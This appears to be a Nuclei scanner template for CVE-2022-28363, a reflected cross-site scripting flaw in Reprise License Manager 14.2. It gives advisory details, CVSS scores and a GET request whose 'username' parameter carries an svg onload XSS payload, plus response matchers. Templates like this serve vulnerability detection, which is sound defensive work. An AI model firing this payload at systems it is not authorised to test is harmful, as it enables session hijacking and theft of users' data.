id: CVE-2022-28363 info: name: Reprise License Manager 14.2 - Cross-Site Scripting author: Akincibor severity: medium description: | Reprise License Manager 14.2 contains a reflected cross-site scripting vulnerability in the /goform/login_process 'username' parameter via GET, whereby no authentication is required. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of Reprise License Manager or apply the vendor-supplied patch to mitigate this vulnerability. reference: - https://www.reprisesoftware.com/products/software-license-management.php - https://github.com/advisories/GHSA-rpvc-qgrm-r54f - http://packetstormsecurity.com/files/166647/Reprise-License-Manager-14.2-Cross-Site-Scripting-Information-Disclosure.html - https://nvd.nist.gov/vuln/detail/CVE-2022-28363 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-28363 cwe-id: CWE-79 epss-score: 0.00237 epss-percentile: 0.61755 cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: reprisesoftware product: reprise_license_manager tags: cve,cve2022,xss,rlm,packetstorm,reprisesoftware http: - method: GET path: - "{{BaseURL}}/goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E" matchers-condition: and matchers: - type: word part: body words: - '' - 'Login Failed' condition: and - type: word part: header words: - "text/html" - type: status status: - 200 # digest: 4a0a004730450221009cabb9f3b7b245bdc3be120583ff229a0be196081974f54a7d9fc5d1ed16f053022076cc6d5c2920f4afcaa7901929fba1fdc79b7cc28e3911318c7d24597a994277:922c64590222798bb761d5b6d8e72950